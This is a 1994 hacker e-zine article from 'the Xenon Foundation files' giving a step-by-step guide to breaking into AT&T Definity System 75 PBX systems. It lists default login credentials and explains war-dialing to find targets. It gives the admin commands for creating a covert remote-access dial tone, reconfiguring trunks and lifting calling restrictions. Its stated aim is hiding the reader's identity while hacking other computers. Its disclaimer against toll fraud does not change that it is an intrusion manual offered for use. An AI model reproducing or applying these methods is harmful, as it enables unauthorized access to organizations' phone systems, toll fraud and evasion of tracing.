__
                      \ /          |_
                      / \ e n o n  |  o u n d a t i o n 
                                
                                  presents:
                                  
                                  \     /
                      *------  the  \ /  
                                    / \  files  ------*
                                  /     \
                
                            Spring/1994  Issue: 15
         
                     "Stealth in Diverting - PBX Style"
                      
                                By: Erik Turbo

Disclaimer: 
      
     The information provided below is solely for the purpose of diverting
     yourself  from possible  traces, ANI, and Caller ID.  It  is *not* to
     be used for long distance toll fraud, including abusing 900 services, 
     using illicit calling cards, or other forms of credit card fraud.


Introduction
~~~~~~~~~~~~
A PBX, or Private Branch eXchange, is an on-premise facility, owned or leased
by an organization,  which interconnects  the telephones  within the facility
and  provides  access  to the  public  telephone  system.  Basically, it is a
mini-switching station,  and  allows a telephone user on the premises to dial
a  three  to four digit  number (extension) to  call another telephone on the
premises,  and dials  one digit  (usually 8 or 9)  to get a  dial tone for an
"outside line,"  which  allows  the  caller to  dial  out to  the rest of the
public  telephone user.  This is the most important feature for a hacker that 
desires the stealth that is necessary to continue his explorations. In short, 
you can remain well-hidded if you use a PBX's outside lines to connect to the 
computer you are hacking.  That way,  any Caller ID, ANI, or trace will reach 
the PBX number - not your home telephone.  When  you have mastered the art of 
PBX hacking,  you should  make a habit of diverting with 3 or 4 "well spaced" 
PBX's  before  hitting your  target  destination.  For  the  advanced hacker, 
diverting  with PBX's  is just  the beginning  of his actual diversion; it is 
best  to bury  yourself  in  packet-switched  networks,  loop  in  and out of 
Internet hosts, bounce yourself off of satellites with International calling, 
and  utilize all of the  data-based outdials that you have. Remember, abusing 
these PBX's for un-necessary long distance calling is NOT condoned by me,  or 
any members of the Xenon Foundation; it will kill the PBX quicker,  and place 
you at risk of serious fraudulant charges. 

Definity G Model System 75
~~~~~~~~~~~~~~~~~~~~~~~~~~
Definity  model  System 75 systems  control a large number of medium-sized
(approx. 1000 lines)  PBX's.  It  is owned  by AT&T,  and was developed in
the late 1970's, with modifications in 1983,  and 1986.  The actual System
75  machine has  one or  more incoming  1200bps data lines,  which connect
at 7E1.  It  is  through  this  remote port that you may begin your actual
hacking of the PBX.  Since all of the  changes you  may via  modem  affect
the  entire  telephone  network on the  PBX, this is a power that you will
have  to learn  how to  abstain from  abusing.  It is possible to turn the
once  smoothly operating phone system into a chaotic mass of busy signals,
re-routes, Voice Mail Box's, tones, and bridges, effectively shutting down 
the victim for hours,  if not days.  For this  reason,  I will only inform
readers on how to create a remote extension for diverting purposes.

Connection
~~~~~~~~~~
The  best way  to find a System 75 is to scan ("wargame dial") your local
telephone exchanges.  There  are  still  dozens of  them around,  and you
are bound to hit at least one in a few days of scanning.  Upon connection
you will see the System 75 login and authorization prompts:

Login: xxx
Password: xxx
INCORRECT LOGIN

You  will be given  three chances  to guess authorization password before
the  system  will  drop  carrier.  On  telephone   systems  that  provide 
Caller ID services,  I would be weary; it is quite possible the System 75
dialup as well as the PBX are equipt with ANI for auditing purposes.

Default Accounts and Passwords
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                  
With  every  new  System  75 package,  AT&T  includes a  large  number of 
accounts  and passwords  already installed and ready for usage.  Usually, 
these passwords are never changed by the owners. Here is a listing of the 
known System 75 default accounts and passwords that are included in every 
Definity G package:

Login: enquiry  Password: enquirypw
Login: init     Password: initpw
Login: browse   Password: looker
Login: maint    Password: rwmaint
Login: locate   Password: locatepw
Login: rcust    Password: rcustpw
Login: tech     Password: field
Login: cust     Password: custpw
Login: inads    Password: inads
Login: support  Password: supportpw
Login: bcim     Password: bcimpw
Login: bcnas    Password: bcnspw
Login: craft    Password: craftpw

Note: The browse account can *not* modify anything on the system 75.
      It is only useful for examining the possibility of an existing 
      remote extension, not for the actual creation of one.


Internal System 75 Commands
~~~~~~~~~~~~~~~~~~~~~~~~~~~
If those  defaults did not work,  the only other alternatives is social
engineering,  and brute  force  hacking.  Both  are not  likely to work 
unless you are a social engineering master, or have time to waste brute
force  hacking.  Your  best bet is to move on and hope to scan a lesser 
protected System 75.

Assuming  you have passed  the authorization, you will be prompted with
the following:

Terminal Type (513, 4410, 4425): [513] 

These  are the  basic  System 75  remote  usage emulation codes.  I prefer 
to use 4410,  as  it  appears  much  "cleaner"  on  a  VT100  IBM PC.  The 
emulation  is  used  to remotely send System 75 key sequences,  to request 
help, to save a session, to move forward a page, to move back a page, etc. 
Since  the  IBM keyboard  has no way  to emulate these keys, the System 75 
provides  3  basic  emulation  codes.  For  our  purposes,  use 4410.  The 
following sequences will work with emulation 4410:
                        
ESC Op - To cancel a command
ESC Ot - To request Help
ESC Ov - Next Page
ESC Ow - Previous Page
ESC Or - Save
ESC Oq - Refresh Screen
ESC Os - Clear Fields

You can achieve  the escape sequences by hitting the ESC key, and then the
key combination O and the following character.

Once you have choses emulation 4410, please remember (or take note) of the
previous  escape  sequences.  You  will  not  be able  to save information 
without knowing the proper code. ("ESC Or"). ESC Op is also very important
since  it  is  the  only  method  of  stopping the execution of a command; 
something  you will have to do constantly when looking over certain pieces 
of information within the System 75.  Take these down!

Next you will see the AT&T banner and the command prompt:
                        
                        
                        Copyright (c) 1986 - AT&T


                   Unpublished & Not for Publication


                          All Rights Reserved 

enter command:

There is online help avaiable at all times by pressing "ESC Ot", as well
as  keying 'help' at  the command prompt.  Familiarize yourself with the
system.  It  is  basically  cryptic,  as  it  is  usually  only  used by 
experienced AT&T technicians.

Examining the PBX 
~~~~~~~~~~~~~~~~~
Once you are in, you now want to get to working on your  diverter.  What
you will obviously need is an extension dedicated  explicitly for a dial
tone  to the  outside  network.  To accomplish  this quickly and easily,
all you must do is type  "change remote" at  the  command  prompt.  This
will bring you to the following screen:

change remote-access                                           Page  1 of  1
                                REMOTE ACCESS
               
               
               Remote Access Extension:
                   Barrier Code Length: 
BARRIER CODE ASSIGNMENTS (Enter up to 10)
        
        Barrier Code    COR                    Barrier Code    COR
     1:                 1                    6:                 1
     2:                 1                    7:                 1
     3:                 1                    8:                 1
     4:                 1                    9:                 1
     5:                 1                    10:                1

As you can see, there is no remote access extension set up, therefor this
PBX  does not  have any existing dialtones available.  Now to create one,
type  in the  extension  you  wish  to  direct you  to your dialtone. The 
extension you type in should be a 4 digit number, startin with "2" or "4"
as  these are valid  extensions  under System 75 software.  When you type
in your extension, press enter; if it gives you an error, try a different
extension until it accepts your input.  

If  you wish  to add a security code on your dialtone, you may enter it's
length at  the "Barrier Code Length:" prompt.  Under the heading "Barrier
Code", at the "1:" prompt, type in your desired security code.  After you
are all set, the screen should look something like this:

change remote-access                                           Page  1 of  1
                                REMOTE ACCESS
               
               
               Remote Access Extension: 2400
                   Barrier Code Length: 6
BARRIER CODE ASSIGNMENTS (Enter up to 10)
        
        Barrier Code    COR                    Barrier Code    COR
     1: 222222          1                    6:                 1
     2:                 1                    7:                 1
     3:                 1                    8:                 1
     4:                 1                    9:                 1
     5:                 1                    10:                1

Now you have a working extension that is not only available for your
use in diverting,  but also secure  from others who do not know your
barrier code.  Type the key combination "ESC Or" to save your work.

Finding the PBX Dialup
~~~~~~~~~~~~~~~~~~~~~~
Now that you are guarenteed a tone, you must find out the telephone number
the  PBX is  located at.  Type  "list trunk-group"  at the command prompt.
It should give you a listing similar to this:


Group                                       No. of                  Outgoing
Number  TAC  Group Type    Group Name       Members   COR   SMDR?   Display?

1       801   co           Incoming          12        1     y        n
2       851   co           Sales Room         1        1     y        n
9       809   co           Billing            4        1     y        n
10      810   co           Admin line         1        63    y        n
                                                                                Command successfully completed CANCEL         P                                                           HELP          T                                                       
Now that you have a listing of all the trunk groups that are present on the
PBX,  you can  individually  list them to get their corresponding telephone
numbers.   Type   "display  trunk-group 1",   to  display   trunk  group  1 
(Group Number 1,  Group Name  "Incoming").  As  you  can see from the above
capture,  there  are  4 trunks available; 1, 2, 9, and 10.  Display each of
them,  and use  the  'next page' ("ESC Ov")  key  combination to get to the
page  (usually page 2, or 3) with  the telephone numbers to the trunk. Each 
time  you  display  the  trunks,  you  will  get  a  screen  similar to the 
following:

display trunk-group 1                                           Page  1 of  5
                                TRUNK GROUP

Group Number: 1                    Group Type: co            SMDR Reports? y
  Group Name: Incoming                    COR: 1                      TAC: 801
   Direction: two-way        Outgoing Display? n         Data Restriction? n
 Dial Access? y                Busy Threshold: 60           Night Service:
Queue Length: 0                                      Incoming Destination: 200
   Comm Type: voice                                 Digit Absorption List:
    Prefix-1? n                   Restriction: toll    Allowed Calls List? n

TRUNK PARAMETERS
            Trunk Type: loop-start
    Outgoing Dial Type: tone
     Trunk Termination: rc                    Disconnect Timing(msec): 500
        ACA Assignment? n
                                                    Maintenance Tests? y
 Answer Supervision Timeout:                    Suppress # Outpulsing? n
_____________________________________________________________________________

To get the actual dialups, you must look on the following pages. The
"ESC Ov" combination will do that under emulation 4410:

_____________________________________________________________________________
display trunk-group 1                                           Page  2 of  5
                                 
                                 TRUNK GROUP 

GROUP MEMBER ASSIGNMENTS
                 
                 Port      Name         Mode         Type    Answer Delay
              1: A0101    555-2322
              2: A0102    555-2342
              3: A0103    555-2343
              4: A0104    555-2345
              5: A0105    555-2456
              6: A0106    555-2457
              7: A0107    555-2458
              8: A0108    555-2459
              9: A0201    555-2460
             10: A0202    555-2461
             11: A0203    555-2462
             12: A0204    555-2470
             13: A0205    555-2800
             14: A0206    555-2810
             15: A0207    555-2811

Make a note  of the telephone numbers on the trunks, and dial  them up after 
logging  off  the  System  75.  When  you  dial  them  up  voice,  if one of 
them prompts you for an extension, type in the remote extension  you created 
earlier.  You should hear the tone to an outside line.  If  you created  the 
remote extension with a barrier code, touch-tone that in now. Next, dial "9" 
to  get an outside line (It can also be "8" on some systems),  and then dial 
the  telephone number  you want to reach, just as normally as you would from
your home telephone.

Tricks and Hints
~~~~~~~~~~~~~~~~
The following are methods and commands that can be used in addition to
the  above mentioned  hacking tactics.  They  are not necessary to the
smooth creation of a remote dialtone off of a PBX, however.

When  you are displaying the trunk-groups individually, look under the
heading  "Direction: "  (found on page 1).  If it says "one-way", then
modify that (with the "change trunk #" command) to say "two-way". Also 
on page 1, change the "Incoming Destination: "  header to reflect your
newly  created  remote  access extension  that you created earlier. On
the  next page,  get  the  dialups.  You have just created a large set
of  tones.  Since  they  used  to be  "one-way", only users within the 
building  could use  them to dialout, but since you have changed it to 
"two-way",  and  changed the  incoming  destination  extension to your
remote extension,  you are  allowing incoming  callers to use the tone 
service as well.

If you do  not want to arouse suspicion, instead of changing the "Incoming
Destination: " to your extension, just change the "Night Service: " header
to your remote  extension.  With this,  however, you can only use the tone
service after hours; usually after the business closes.


To  get  an  idea  of how the extensions are uniformly placed on the PBX,
type  "display dialplan" at  the  command  prompt.   This  will  give you
all the prefix's to the three or four digit extensions.  This is valuable
if  you are  having  trouble  finding  a valid  extension to use for your
remote extension.

When  displaying  a trunk  group, mark down the COR (Class of Restriction)
number.  Type  "display COR #"  (where #  is the  COR number of a specific
trunk). Make sure the FRL prompt is set to 7, and the calling restrictions 
are  set to  "none".  If not,  type  "change cor  (COR #)",  and  make the 
necessary modifications.  

Type "display feature" to get a listing of all the feature access codes on 
the system. This is valuable if you can not get an outside line by dialing 
"9", or "8".  The dialout access code will be in here.


Conclusion
~~~~~~~~~~~                                                              
Basically,  it is  extreemly simple  to create a remote extension off of a
PBX  in  your local area.  If you use the PBX just to make local calls and
to divert  yourself further  through the telephone network, it should last
a  rather  long  time.   However,  if  you  abuse  it by dialing  Alliance 
Teleconferences every night, or to call your friend in the UK  three times 
a day, it will either die, or get slapped with ANI.  
                               
I  have  tried to be  as straight  forward  as possible, without having to
technically  explain  every detail of operation.  Once you get the hang of
it,  you should  be able to  create  your  remote  extensions  in under 10 
minutes.  However,  if you  are having problems, you can contact me at the 
following locations:

Internet Mail: erikt@xf.com
Void of Deception: [508]/998-2400

Additional Reading:
~~~~~~~~~~~~~~~~~~~
Hacking AT&T System 75, Scott Simpson, Phrack 41, File 6.
System 75 Hacking (An Online Tutorial), Panther Modern, COTNO01.TXT, File 3.
Data and Computer Communications, William Stallings, Macmillan Publishing Co.